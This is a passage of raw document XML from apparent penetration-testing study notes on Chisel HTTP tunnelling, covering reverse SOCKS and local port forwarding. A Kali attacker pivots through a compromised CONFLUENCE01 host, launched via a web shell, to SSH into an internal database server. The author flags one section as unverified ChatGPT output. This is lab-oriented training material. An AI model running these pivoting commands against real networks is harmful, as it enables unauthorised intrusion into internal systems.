    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A74">
      <w:pPr>
        <w:spacing w:after="0" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="276" name="image249.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image249.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20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A75">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --port 8080 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A76">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A77">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, we can check the status of our SOCKS proxy with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A78">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A79">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2273300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="242" name="image240.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image240.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId209"/>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A7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A7B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A7C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go back to the Original "Using Chisel" section to see how to use Chisel with SSH </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A7D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A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F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ba7s5dvitpqj" w:id="90"/>
      <w:bookmarkEnd w:id="90"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP Tunneling using Chisel (Local Port forwarding)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A80">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from chatGPT so use it with a grain of salt. I would recommend you look at this simple guide below instead, which teaches how to do all the different styles of port forwarding using Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A81">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="175"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId225">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://notes.benheater.com/books/network-pivoting/page/port-forwarding-with-chisel</w:t>
        </w:r>
      </w:hyperlink>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A82">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario for Local Port Forwarding with Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A83">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali attacker</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192.168.118.4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A84">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Compromised pivot machine (CONFLUENCE01)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192.168.50.63</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A85">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target inside internal network (PGDATABASE01)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10.4.50.215</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">reachable only from CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A86">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">has outbound HTTP (port 8080) access</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali is listening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A87">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal: Forward a port from PGDATABASE01 to Kali via CONFLUENCE01 using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local port forward</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so that Kali can access PGDATABASE01 directly on a local port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A89">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Port Forwarding Explained</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A8A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unlike reverse port forwarding, where the SOCKS proxy is opened on the attacker side, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local port forwarding opens a port on the victim/pivot side</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CONFLUENCE01), and forwards it through the HTTP tunnel to a target service </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali can’t normally reach directly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, like PGDATABASE01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A8B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A8C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step-by-Step Setup for Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A8D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Start Chisel server on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="508"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A8F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="508"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This opens an HTTP listener on port 8080 on Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A90">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A91">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A92">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Prepare Chisel client on CONFLUENCE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A93">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You want to forward PGDATABASE01's SSH (10.4.50.215:22) to Kali as localhost:2222, so you can SSH into PGDATABASE01 by just hitting 127.0.0.1:2222 on Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A94">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A95">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s the Chisel client command to do that:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A96">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1226"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/chisel client http://192.168.118.4:8080 2222:10.4.50.215:22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A97">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A98">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CONFLUENCE01 connects to the Kali Chisel server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A99">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It forwards Kali's 127.0.0.1:2222 to 10.4.50.215:22 from CONFLUENCE01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A9A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1267"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You'd run this on CONFLUENCE, through a web shell for example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A9B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A9C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You could redirect output just like in the reverse case to confirm success if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A9D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A9E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. SSH into the target machine (PGDATABASE01) from Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A9F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the tunnel is up:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh database_admin@127.0.0.1 -p 2222</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000AA3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
